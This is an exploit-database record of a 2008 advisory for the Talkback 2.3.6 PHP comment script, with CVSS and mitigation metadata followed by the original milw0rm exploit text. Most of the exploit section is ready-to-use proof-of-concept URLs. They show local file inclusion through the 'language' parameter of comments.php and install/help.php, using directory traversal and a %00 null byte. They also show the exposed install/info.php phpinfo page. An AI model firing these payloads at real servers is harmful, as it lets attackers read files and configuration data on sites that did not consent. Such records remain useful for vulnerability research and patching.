Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure

vendor:

Talkback

by:

SirGod

7.5

CVSS

HIGH

Local File Inclusion/PHPInfo Disclosure

CWE

Product Name: Talkback

Affected Version From: 2.3.2006

Affected Version To: 2.3.2006

Patch Exists: YES

Related CWE: N/A

CPE: a:talkback:talkback:2.3.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure

Talkback 2.3.6 is vulnerable to Local File Inclusion and PHPInfo Disclosure. An attacker can exploit this vulnerability to include local files and disclose sensitive information such as the PHP configuration.

Mitigation:

Upgrade to the latest version of Talkback.

Source

Exploit-DB raw data:

############################################################################################################
[+] Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure
[+] Discovered By SirGod 
[+] MorTal TeaM                     
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke                     
############################################################################################################

 [+] Local File Inclusion


   PoC 1 :

     http://[target]/[path]/comments.php?language=[Local File]%00

   Example 1 :
  
     http://127.0.0.1/talkback/comments.php?language=../../../../autoexec.bat%00


   PoC 2 :

     http://[target]/[path]/install/help.php?language=[Local File]%00

   Example 2 :

     http://127.0.0.1/talkback/install/help.php?language=../../../../../autoexec.bat%00



 [+] PHPInfo Disclosure


   PoC:

     http://[target]/[path]/install/info.php

   Example :

     http://127.0.0.1/talkback/install/info.php


##############################################################################################################

# milw0rm.com [2008-09-13]